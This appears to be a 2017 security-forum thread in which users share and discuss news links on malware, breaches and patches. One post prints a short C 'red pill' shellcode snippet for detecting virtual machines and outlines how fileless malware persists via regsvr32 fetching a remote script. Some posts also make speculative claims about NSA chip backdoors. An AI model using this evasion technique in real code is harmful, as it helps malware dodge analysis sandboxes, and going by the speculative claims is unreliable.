Advice: always fully patch, upgrade and backup ;)
D.
-
“Perverse” malware infecting hundreds of Macs remained undetected for years
https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/ (https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/)
-
Adobe Kills Flash Player
http://news.softpedia.com/news/adobe-kills-flash-player-517160.shtml
-
Newly Discovered CowerSnail Backdoor Targets Windows Computers
https://www.bleepingcomputer.com/news/security/newly-discovered-cowersnail-backdoor-targets-windows-computers/ (https://www.bleepingcomputer.com/news/security/newly-discovered-cowersnail-backdoor-targets-windows-computers/)
-
CrowdStrike launches malware search engine
https://www.helpnetsecurity.com/2017/07/26/crowdstrike-malware-search-engine/ (https://www.helpnetsecurity.com/2017/07/26/crowdstrike-malware-search-engine/)
-
A n o t h e r B i g O n e like Wannacry, and again it is with SMB, called SMBloris!
Re: vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000.
It is a a IBM legacy, as SMB v 1 is IBM code.
With this you can bring down a bold Windows-server and crash it just using a Raspberry Pi-computer via a very simple attack!
Insecurity coming to a server near you!
Re: https://www.defcon.org/html/defcon-25/dc-25-speakers.html#Dillon
Re: https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/
Not clear yet Windows is ever gonna patch this gaping hole. They said they would not.
MS reacted: For enterprise customers who may be concerned,
we recommend they consider blocking access from the internet to SMBv1.
But also a reversed engineered variant was involved: Barry Feigenbaum originally designed SMB at IBM with the aim of turning DOS "Interrupt 33" (21h) local file access into a networked file system.[11] Microsoft has made considerable modifications to the most commonly used version. Microsoft merged the SMB protocol with the LAN Manager product which it had started developing for OS/2 with 3Com around 1990, and continued to add features to the protocol in Windows for Workgroups (c.?1992) and in later versions of Windows.
When SMB2 was introduced it brought a number of benefits over SMB1 for third party implementers of SMB protocols. SMB1, originally designed by IBM, was reverse engineered, and later became part of a wide variety of non-Windows operating systems such as Xenix, OS/2 and VMS (Pathworks).
source: https://en.wikipedia.org/wiki/Server_Message_Block :
polonus
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/ (https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/)
One should never pay ransom. :o
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/ (https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/)
One should never pay ransom. :o
I'm surprised anyone pays - are you going to trust the crooks that did this - there is no guarantee that even after payment that the encryption can be decrypted/reversed (bad code).
Ransomware surely must be a wakeup call to have a robust backup (off-line) and recovery strategy (hard drive imaging) before anything serious happens and not necessarily ransomware.
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/ (https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/)
One should never pay ransom. :o
I'm surprised anyone pays - are you going to trust the crooks that did this - there is no guarantee that even after payment that the encryption can be decrypted/reversed (bad code).
Ransomware surely must be a wakeup call to have a robust backup (off-line) and recovery strategy (hard drive imaging) before anything serious happens and not necessarily ransomware.
By now, you would think that's the case. I'm always surprised while talking to folks at a presentation, that most people don't start a recovery and backup strategy till after a disaster of some type has happened. Many think that an infection or a hardware failure only happens to the other person.
That also holds true for secure passwords and the use of 2 factor ID. Most can't be bothered with the little bit of extra precautions to keep them safe.
Cyber Security Awareness Month is coming up in October. For me it's a packed month with remote presentations scheduled all over the USA.
-
New updates are available for Outlook
https://blogs.technet.microsoft.com/office_sustained_engineering/2017/07/27/new-updates-are-available-for-outlook/
-
Google Revealed an Israeli Spyware Company That Has Quietly Sold Its Wares for Years
https://motherboard.vice.com/en_us/article/evdebz/google-revealed-an-israeli-spyware-company-that-has-quietly-sold-its-wares-for-years
-
Incomplete Word Press intsllations, especially on shared hosting, come under attack to be compromised:
https://www.wordfence.com/blog/2017/07/wpsetup-attack/
Best way to generate a non-interactive-site for n00bs: http://gohugo.io/
polonus
-
Cerber Ransomware Can Now Steal Browser Passwords, Bitcoin Wallet Data
https://www.bleepingcomputer.com/news/security/cerber-ransomware-can-now-steal-browser-passwords-bitcoin-wallet-data/ (https://www.bleepingcomputer.com/news/security/cerber-ransomware-can-now-steal-browser-passwords-bitcoin-wallet-data/)
-
Department of the Army concerned about DJI drones exposing collected information
http://www.ainonline.com/aviation-news/defense/2017-08-04/us-army-grounds-dji-drones-over-cyber-vulnerabilities
-
Researchers Put Windows Defender in a Sandbox to Show Microsoft How It's Done
https://www.bleepingcomputer.com/news/security/researchers-put-windows-defender-in-a-sandbox-to-show-microsoft-how-its-done/
-
Cyber-Attack on Solar Panels Could Shut Down Power Grids via Domino Effect
https://www.bleepingcomputer.com/news/security/cyber-attack-on-solar-panels-could-shut-down-power-grids-via-domino-effect/
-
Researchers Put Windows Defender in a Sandbox to Show Microsoft How It's Done
https://www.bleepingcomputer.com/news/security/researchers-put-windows-defender-in-a-sandbox-to-show-microsoft-how-its-done/ (https://www.bleepingcomputer.com/news/security/researchers-put-windows-defender-in-a-sandbox-to-show-microsoft-how-its-done/)
Doing so increases security but totally degrades performance.
-
Careful, Chrome Extension Developers Under a Barrage of Phishing Attacks
https://www.bleepingcomputer.com/news/security/chrome-extension-developers-under-a-barrage-of-phishing-attacks/
-
Australian Red Cross data breach caused by third-party error
https://www.scmagazine.com/australian-red-cross-data-breach-caused-by-third-party-error/article/680149/
-
L.S.
Whenever you do not want to be associated to be visiting so-called conspiracy or fake-news websites, intstall this into your adblocker of choice: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts
Websites like prison planet, sorcha faal etc, then become blocked, as some official media may frown upon the points of view these websites share.
You can block strictly or just unblock to visit some site once.
polonus
-
Patch this a.s.a.p. as it is an ideal vulnerability to be exploited by malcreants to take over the host: https://www.zerodayinitiative.com/blog/2017/8/8/the-august-2017-security-update-review
-> https://portal.msrc.microsoft.com/en-US/eula
polonus
-
Patch this a.s.a.p. as it is an ideal vulnerability to be exploited by malcreants to take over the host: https://www.zerodayinitiative.com/blog/2017/8/8/the-august-2017-security-update-review (https://www.zerodayinitiative.com/blog/2017/8/8/the-august-2017-security-update-review)
-> https://portal.msrc.microsoft.com/en-US/eula (https://portal.msrc.microsoft.com/en-US/eula)
polonus
The auto update from MS happened yesterday without incident. :)
-
Hi bob3160,
Also landed here while I was fanless quitely computing in N.W. Poland ;)
pol
-
Locky Ransomware Returns with Spam Campaign Pushing Diablo6 Variant
https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-with-spam-campaign-pushing-diablo6-variant/
-
Windows computers open to RDP? Means a gigantic threat: https://community.rapid7.com/community/infosec/blog/2017/08/09/remote-desktop-protocol-exposure
By far most computers open to attack are based in the USA and China. In the Netherlands we find 114.000 computers with tcp-port 3389 open.
polonus
-
2016 Was Bad — 2017 Looks Worse
https://safeandsavvy.f-secure.com/2017/08/09/2016-was-bad-2017-looks-worse/
-
2016 Was Bad — 2017 Looks Worse
https://safeandsavvy.f-secure.com/2017/08/09/2016-was-bad-2017-looks-worse/ (https://safeandsavvy.f-secure.com/2017/08/09/2016-was-bad-2017-looks-worse/)
Really not new. It's gotten worse every year since they've started to keep records.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/ (https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/)
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
-
Hi bob3160,
Some browsers without any extensions are just as much of a privacy risk.
Google for instance knows more about you than your next of kin.
So I just like a good script blocker and a decent ad-blocker as that is how Google
and others that sell all of your data come by that information, and some of it can/should be blocked.
So you cannot blame extensions (and Google extension api) and let the browser off of the hook.
polonus
-
Hi bob3160,
Some browsers without any extensions are just as much of a privacy risk.
Google for instance knows more about you than your next of kin.
So I just like a good script blocker and a decent ad-blocker as that is how Google
and others that sell all of your data come by that information, and some of it can/should be blocked.
So you cannot blame extensions (and Google extension api) and let the browser off of the hook.
polonus
Your response directed at me and I assume the post I made, has nothing to do with my post or the
advice passed along by that post.
We all know that Google knows a lot about us. So does Bing and Yahoo and many others.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/ (https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/)
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
Very interesting if your image is one that and the wording on the bottom of it has been created by Avast.
Whilst your image isn't related to a browser App, but Android Mobile App.
Then Avast should look close to home, namely the Avast battery Saver App for Android. Some time ago I was going to install this, but when I looked at the Permissions it required, I backed out of the Play Store. For me the permissions were excessive for what was a battery saver app, they wanted access to very many areas I felt it had no reasonable need to.
Hell the only thing not asked for was my inside leg measurement.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/ (https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/)
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
Very interesting if your image is one that and the wording on the bottom of it has been created by Avast.
Whilst your image isn't related to a browser App, but Android Mobile App.
Then Avast should look close to home, namely the Avast battery Saver App for Android. Some time ago I was going to install this, but when I looked at the Permissions it required, I backed out of the Play Store. For me the permissions were excessive for what was a battery saver app, they wanted access to very many areas I felt it had no reasonable need to.
Hell the only thing not asked for was my inside leg measurement.
The words on the bottom are mine and this indeed is a caution about installing Apps.
-
8 Google chrome extensions hacked to spread adware:
https://www.proofpoint.com/us/threat-insight/post/threat-actor-goes-chrome-extension-hijacking-spree
Extension published by a bad actor after the legitimate extension was compromised....
With Google chrome extensions now coming to every major browser (firefox etc.)
his new browser extension mono-culture makes it much easier for attackers,
and less secure for end-users.
Programmers falling for an insecure link to click, not an unsavvy end-user or a computer nitwit... :o
Where for Pete's sake we are heading seen to browser security?
I, polonus, my dear friends, I fear here with great fear :-X :'(
polonus
-
Ransomeware targeting WordPress sites: https://www.wordfence.com/blog/2017/08/ransomware-wordpress/
polonus
-
New Malware Abuses PowerPoint Slide Show
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/
-
The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard
http://blog.trendmicro.com/trendlabs-security-intelligence/connected-car-hack/
-
Hundreds of adware infested android-apps in Google Play,
one hundred or so of these adware-laden apps still were not been taken down by Google.
More and more the Google Chrome Android Mono-Culture is becoming a privacy and adware nightmare for end-users,
as the Google chrome browser mono-culture is becoming a likewise threat.
Less and less alternative paths open for those that want to evade these intrusions. :'( :-[
Even firefox has thrown the towel to further the Google extension api everywhere.
More attack surface means less defense and bigger threats to the sheeple!!!!
Re: http://blog.trendmicro.com/trendlabs-security-intelligence/ghostclicker-adware-is-a-phantomlike-android-click-fraud/
polonus
-
It’s baaaack: Locky ransomware is on the rise again
https://nakedsecurity.sophos.com/2017/08/17/its-baaaack-locky-ransomware-is-on-the-rise-again/
-
New Disdain Exploit Kit Detected in the Wild
http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/
-
Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004
https://www.drupal.org/SA-CORE-2017-004
-
500 adridden apps removed by Google from the webstore:
http://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Read about the development: https://blog.lookout.com/igexin-malicious-sdk
Mainland China testbed for ad- and spyware for developers and surveillance alike.
Do not read here, as it comes ad-ridden by itslef, block link: htxp://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Link found in: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts (uBlock O).
polonus
-
List of programs to stay away from or be specially cautious with,
because firm pays to compromise them through zero-days:
hxtps:%2F%2Fzerodium.com%2Fprogram.html&originalURL=973370001&pip=false&premium=false&client_uid=1241509284&client_ver=4.0.6.149&client_type=IEPlugin&suite=false&aff_id=662-187&locale=nl_nl&ui=1&os_ver=6.3.0.0
(link broken by me, as it could be risky for the non-savvy).
Firm is buying zero-days on chat-apps like Signal, WhatsApp, WeChat, Telegram, Facebook Messenger and Viber.
Amazing there are states in the world where such security-endangering trade of zero-days can be performed within legal bounds. :o
polonus
-
New EMPTY CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/
-
Cannot it be made really and one-way secure? HTTP public key pinning, they giving up on HPKP:
Read on backgrounds:
https://www.theregister.co.uk/2017/08/25/hpkp_crypto_criticism/ (link author = John Leyden)
Because of the complexity and feared attacks like: https://scotthelme.co.uk/using-security-features-to-do-bad-things/
Trust chains must be unbroken, no certs should be issued in error ever, some to trust https://certificatechain.io/
and do not forget to check the code is correct. Cert should be in your DNSSEC authenticated DNS records.
It could come to it that we could also drop most of the root CAs from browsers
or at least devalue them to orange padlocks or something, until explicitly trusted. DANE will come coded into the browser
Chrome and firefox). Time to change to DNSSEC, but a lot of banks haven't yet changed... (info source from comments to article)
pol
-
L.S.
Trying to get the 0-ring on chips sort of tinkerproof by disabling Intel Management Engine via a new method.
Probably the availability of this bit can only mean NSA requires a possibility to de-install this attack-vector to just use it for themselves. Also consider for instance the new byte by byte load- & tinkerproof Google Titan chip.
Intel and AMD are getting at your data big time, NSA as well as we know by now from the backdoors.
In this case NSA's High Assurance Platform, a NSA trusted platform
(the bit found by researchers in the code was named "reserve_hap")
One thinks it was designed to prevent so-called "side-leaks".
OpenSSL now proven to be crappy and it took Heartbleed to become aware of the real insecure overall 'borked' situation.
So as the going is getting increasingly narrow by using undocumented unsupported features ,
there is need for open software alternatives, to see that resource engineering
is not exclusively meantfor big goverment and big business.
Intel AMT handling now looks weird, just AMT being abused to create a worm of sorts,
and WannaCry in comparison would have been a picknick.
Open source CPU, the Chinese will facilitate (but not in the Lenovo way please). Like this: https://www.forbes.com/sites/rogerkay/2015/03/20/openpower-unlocks-floodgates-for-an-all-chinese-server-business/
POWER9CPU does not cost that much, but the maiboard is very very expensive (because of the low minimal production volumes) 8)
Another name to mention in this context: http://www.lowrisc.org
polonus (volunteer website security analyst and website error-hunter)
-
I am subscribed to Have I been pwned? and have been notified of a huge email and possible password breach, including my Outlook account.
Breach info: https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
Have I been pwned? info: https://haveibeenpwned.com/
-
Update to Security Bulletin (APSB17-24)
https://blogs.adobe.com/psirt/?p=1484
-
Hi simion,
Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs to-day?
Should not we start to use UIN aliases?
polonus
-
"Roboto Condensed Font" social engineering attack targets firefox and chrome users:
https://malwarebreakdown.com/2017/08/30/roboto-condensed-social-engineering-attack-targets-both-chrome-and-firefox-users-various-payloads-being-delivered/
Can be related to coinminer crypto-currency delving malware or to install Nymaim- & Ursniff-malware.
So do not fall for the malcode scam... ;)
polonus
-
Hi simion,
Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs to-day?
Should not we start to use UIN aliases?
polonus
Greetings pol:
Yes, certainly trust is a dwindling commodity on today's internet. But you must trust someone, or why be on the net at all? To me, it is worth the risk of being registered at a site like Have I been pwned? and having my email possibly sold or stolen in a site database attack. My reward is being notified of account breaches which may include my email, password, real name, address and telephone number, Social Security or other personal government identification numbers. The trade-off is clearly worth it.
I'm not familiar with UIN Aliases, but I fear it might be another database to be lost, stolen, or compromised.
Regards,
Simion
-
Thank you, Simion, for your reaction.
I checked and fortunately all of my present mail accounts were/are secure.
Once we were affected from a hack here on the forums, and all were advised to change their account passwords.
An good old trick I learned from an oldtimer admin was to give in a wrong password first and come up with the appropriate one later.
There might be a phase however where we cannot go on any longer without two-phase-authorization.
Certainly education and following best server & client configuration and best practices would help,
but while you visit this site here, you are very well aware of the fact, that the securety status of the general infrastructure on the Interwebs is far below par.
Those that know how to fence for themselves are slowly becoming a small minority,
and that overall situation does not seem to worry the majority of common users and those parties, the situation at hand is suiting them well. >:(
A sorry situation really but we here cannot make the difference as anyone can :(
Stay safe and secure both online as offline, is the wish of
polonus aka Damian (volunteer website security analyst and website error-hunter)
P.S. on UIN aliases: https://www.ltnow.com/using-aliases-in-gmail/
-
"Fileless" backdoor spreading through usb sticks:
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/
and
http://blog.trendmicro.com/trendlabs-security-intelligence/usb-malware-implicated-fileless-attacks/
Payload does not go to disk but enters directly into memory.
Only few Anti-Malware tools can protect against such an attack taking effect.
While all say they are performing memory scans,
this only means they detect "KNOWN" malicious code in memory and not in a generic way.
Backdoors can now spread via shortcuts via USB sticks.
This procedure is mentioned "fileless", because in the registry an entry is entered that calls regsrv32,
while an URL is added into Window's scripting engine,
upon which that URL downloads a script and executes it.
So the computer does not have any "infested file. However every time at boot that same malware is being loaded.
As said not all AV is up to protecting against this form of malware (yet).
This also has certain implementations for Joanna Rutkowska's idea of the stateless laptop: https://blog.invisiblethings.org/2015/12/23/state_harmful.html
She recently spoke about this on A Hanburg Security Conference. Re: https://github.com/rootkovska/state_harmful/blob/master/Makefile
Joanna Rutkowska's red pill code
oanna Rutkowska's red pill code:
int swallow_redpill () {
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
return (m[5]>0xd0) ? 1 : 0;
}
meant for VM on Intel machines...
Backdoors like the JS_POWMET fileless malware were mainly detected to exist in the Asia and the Pacific theater.
polonus
-
<snip>
Thank you, Simion, for your reaction.
Thanks, pol. Stay safe!
-
That Instagram hack is shaping up to be way bigger than anyone thought
http://mashable.com/2017/09/01/instagram-hack-regular-users/?utm_cid=hp-h-1#jEdk3_CXkPqz
http://www.thedailybeast.com/hackers-make-searchable-database-to-dox-instagram-celebs
-
VirusTotal uploader has privacy leaks: http://seclists.org/fulldisclosure/2017/Sep/5
Weak privacy design by both Google and VT.
polonus
-
Presumably this doesn't apply when uploading files directly to the website.
-
Hi Ehmen,
You are right there. It is just the Windows uploader that has this. ;)
polonus
-
Cybersecurity Incident & Important Consumer Information
https://www.equifaxsecurity2017.com/
-
(http://screencast-o-matic.com/screenshots/u/Lh/1504872278860-94841.png)
https://blog.avast.com/equifax-website-hacked-now-what
-
L.S.
If in this new situation you wanna stay monopolist and protect data you should do a better job of it.
and you also should know where you private data went on the non-public Interwebs, read:
https://www.bloomberg.com/news/articles/2017-09-07/three-equifax-executives-sold-stock-before-revealing-cyber-hack
Data commerce through algoritms, a new "weapon of math destruction",
making the rich richer and the poor poorer still.
polonus
-
Lenovo Wasn't Paying Attention: 750,000 Laptops Had Spyware
https://www.inverse.com/article/36136-lenovo-settles-spyware-laptop-case-ftc-32-states
-
Lenovo Wasn't Paying Attention: 750,000 Laptops Had Spyware
https://www.inverse.com/article/36136-lenovo-settles-spyware-laptop-case-ftc-32-states
But they already have form for that going back a few years, at that point I was looking for a new laptop and Lenovo was certainly something I was looking at based on value for money. After the revelation, the Lenovo name went off my radar, trust once lost is very hard to regain.
-
I have a Lenovo but the model isn't on the list of affected computers.
Excellent computer at a very reasonable price. :)
-
Microsoft Office Zero-Day Vulnerability Addressed in September Patch Tuesday
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-office-zero-day-vulnerability-addressed-september-patch-tuesday/
-
Thanks, Pondus, for the "heads-up" on this one. Hope everyone will be so wise to patch immediately.
Another thing, stay away from url-shorteners or use them wisely, as they were used in this Linkedln-phishing-campaign:
https://blog.malwarebytes.com/threat-analysis/2017/09/compromised-linkedin-accounts-used-to-send-phishing-links-via-private-message-and-inmail/
URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both -
ow.ly and a free hosting provider (-gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
polonus aka Damian
-
Thanks, Pondus, for the "heads-up" on this one. Hope everyone will be so wise to patch immediately.
Another thing, stay away from url-shorteners or use them wisely, as they were used in this Linkedln-phishing-campaign:
https://blog.malwarebytes.com/threat-analysis/2017/09/compromised-linkedin-accounts-used-to-send-phishing-links-via-private-message-and-inmail/ (https://blog.malwarebytes.com/threat-analysis/2017/09/compromised-linkedin-accounts-used-to-send-phishing-links-via-private-message-and-inmail/)
URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both -
ow.ly and a free hosting provider (-gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
[-quote]
polonus aka Damian
It also depends on Who is using that shortened link. and if you trust that site and or that person posting the link.
If you aren't sure, it isn't hard to use a tool that shows the actual URL which can always be checked for malicious content.
-
Backdoor in Word Press plug-in Display Widgets abused: https://www.pluginvulnerabilities.com/2017/09/11/wordpress-poor-handling-of-plugin-security-exacerbates-malicious-takeover-of-display-widgets/
polonus
-
Malvertising Campaign Mines Cryptocurrency Right in Your Browser
Malware authors are using JavaScript code delivered via malvertising campaigns to mine different cryptocurrencies inside people's browsers, without their knowledge.
https://www.bleepingcomputer.com/news/security/malvertising-campaign-mines-cryptocurrency-right-in-your-browser/ (https://www.bleepingcomputer.com/news/security/malvertising-campaign-mines-cryptocurrency-right-in-your-browser/)
-
Adware Installs InfoStealer Trojan that it loads via Chrome DLL Hijacking
https://www.bleepingcomputer.com/news/security/adware-installs-infostealer-trojan-that-it-loads-via-chrome-dll-hijacking/
-
CCleaner Compromised to Distribute Malware for Almost a Month
https://www.bleepingcomputer.com/news/security/ccleaner-compromised-to-distribute-malware-for-almost-a-month/
https://forum.piriform.com/index.php?showtopic=48868
https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users (https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users)
-
CCleaner Compromised to Distribute Malware for Almost a Month
https://www.bleepingcomputer.com/news/security/ccleaner-compromised-to-distribute-malware-for-almost-a-month/
https://forum.piriform.com/index.php?showtopic=48868
https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users (https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users)
HOLY MOLY! CCleaner is a very popular tool, used by many, properly also in here. Distribution of a malicious version for over a month, is a very serious issue.
Since CCleaner is now owned by Avast, I expect Avast to follow this up with a tool that can detect, remove and rapport of this infection. A tool which can be run manually, but also deployed via network.
Get cracking Avast, you have some serious cleaning up to do.
-
Well this is where the blame actually should go, the creators of a fake Windows update,
infecting with trojan/win32-floxif-a.
Best removal if affected is restoring your system to a previous state before the infection took place.
Also remember for the free version of CCleaner, a manual update is needed.
So in the future always run your OS as user, not as admin, and have back-ups always.
polonus
-
Locky Ransomware Pushed Alongside FakeGlobe in Upgraded Spam Campaigns
http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-pushed-alongside-fakeglobe-upgraded-spam-campaigns/
=======================================================
In the specific campaigns discussed below, both Locky and the ransomware FakeGlobe were being distributed—but the two were rotated. The cybercriminals behind the campaign designed it so that clicking on a link from the spam email might deliver Locky one hour, and then FakeGlobe the next. This makes re-infection a distinct possibility, as victims infected with one ransomware are still vulnerable to the next one in the rotation.
=======================================================
-
Another mobile anti-virus app did not protect but infect: https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/
Who, what and where can you fully trust in the digital infrastructure any longer, when the going gets narrow.
polonus
-
Another mobile anti-virus app did not protect but infect: https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/ (https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/)
Who, what and where can you fully trust in the digital infrastructure any longer, when the going gets narrow.
polonus
1st tip, don't use what you don't know. 2nd tip even if you know the company, do a bit of investigating before installing.
3rd tip always back up what you can't afford to lose. Nothing is ever 100% so you need a way back if what you depend on to keep
you safe, fails.
-
Closer to home, EFF warned because of the recent 'supply chain" CCleaner attack:
Read:
https://air.mozilla.org/why-and-how-of-reproducible-builds-distrusting-our-own-infrastructure-for-safer-software-releases/
also
https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
Why it becomes harder and harder to have trust in Trust!
polonus
-
Closer to home, EFF warned because of the recent 'supply chain" CCleaner attack:
Read:
https://air.mozilla.org/why-and-how-of-reproducible-builds-distrusting-our-own-infrastructure-for-safer-software-releases/ (https://air.mozilla.org/why-and-how-of-reproducible-builds-distrusting-our-own-infrastructure-for-safer-software-releases/)
also
https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf)
Why it becomes harder and harder to have trust in Trust!
polonus
A simple analogy. A Restaurant with one excellent cook is pretty trustworthy.
When expansion happens and we now have 10 cooks, that trustworthiness now decreases because it's harder to trust 10 people.
It also becomes harder to track the responsible person when something goes wrong. It also becomes harder to quickly correct the problem.
-
Poor Internal Security Measures/Practices Take a Toll:
More data lost or stolen in first half of this year than in all of 2016
http://breachlevelindex.com/assets/Breach-Level-Index-Report-H1-2017-Gemalto.pdf
-> https://www.theregister.co.uk/2017/09/20/gemalto_breach_index/
Wise up, folks, now learn and educate, don't be sloppy or let yourselves be dumbed down
by legit and illegal data grabbers :o
pol
-
More concerns about the CCleaner Control and Command Server,
additional malware has been installed to a small number of victims,
approx. 20 servers with 8 organizations, that have infested around 2.2 million users.
Thanks to api-hacker group: "Chinese time zone PRC, APT17/Group 72".
Read: http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
Some more background on this sophisticated hacker group:
https://blogs.cisco.com/security/talos/opening-zxshell & https://attack.mitre.org/wiki/Group/G0001
Information the info stealer gathers:
local hostname
organization
owner
operating system details
CPU speed
total physical memory
polonus
-
Serious gaping hole in Joomla CMS - update asap: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
pol
-
Word Press plug-in developers partnered with spammers and spammed you for 4 to 5 years:
https://www.wordfence.com/blog/2017/09/coordinated-plugin-spam/
It's all about the money... ;D
pol
-
Continuing update on the Ccleaner investigation:
https://blog.avast.com/progress-on-ccleaner-investigation
-
In the light of the recent CCleaner data breach with many victims in my country, the Netherlands I pondered on this info,
that has been available for us all for quite some time. But what can the common end-user do, when no one protects us
against the spooks that instigate this on the infrastructure.... :o
Where government agents put us at risk, command-and-control-server with weaknesses and RATs:
Read:
http://searchsecurity.techtarget.com/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware
&
https://campustechnology.com/articles/2017/05/02/industry-tool-detects-thousands-of-c2-server-rats.aspx
&
https://www.fireeye.com/blog/threat-research/2010/09/chasing-cnc-servers-part-2.html
&
https://tweakers.net/nieuws/123911/interpol-en-beveiligingsbedrijven-identificeren-8800-c2-servers-in-zuidoost-azie.html
(use Google translate to do a quick and dirty translation into English)
If there is no hardenened server security or low end insecure C2 servers are being used, those entities (groups/firms) these actions are directed against are "food for the birds" soon. Helped by weak implementations, hiding data traffic via non-public clouds with all sorts of holes, like we had cloudbleed, etc. Unsigned versions :o -> https://www.theregister.co.uk/2017/09/21/slack_linux/
It is a mess, dear forum folks, and it is going from bad to worse. What they wanna cover?
polonus
-
This went wrong with the CCleaner compromittal : Wrong low-end server administering.
- One did not have any insight in (non-standard) network traffic;
- No following up/alert for the server being low on diskspace;
- No following up/alert that logging was being removed / Did they have permission (RCE/EoP?);
- No log backup but an external system;
- No follow up/alert that the database was corrupted;
- No follow up/alert that a re-installation of the database had been taken place.
Hopefully avast servers are better being protected...
polonus
-
Heartbleed, Cloudbleed..... Is there more , yes -Optionsbleed:
https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html
Not always configured as should be: https://simonecarletti.com/blog/2016/08/redirect-domain-http-https-www-apache/
polonus
-
Another one to join the leakers'band. Verizon: https://www.theregister.co.uk/2017/09/22/verizon_falls_for_the_old_unguarded_aws_s3_bucket_trick_exposes_internal_system/
Data breaches, data breaches and more data breaches: https://mackeepersecurity.com/post/verizon-wireless-employee-exposed-confidential-data-online
polonus
P.S. More clumsiness, Adobe looses a private key online: https://www.theregister.co.uk/2017/09/22/oh_dear_adobe_security_blog_leaks_private_key_info/
D
-
Hundreds of firms vulnerable to be hacked easily via support ticket:
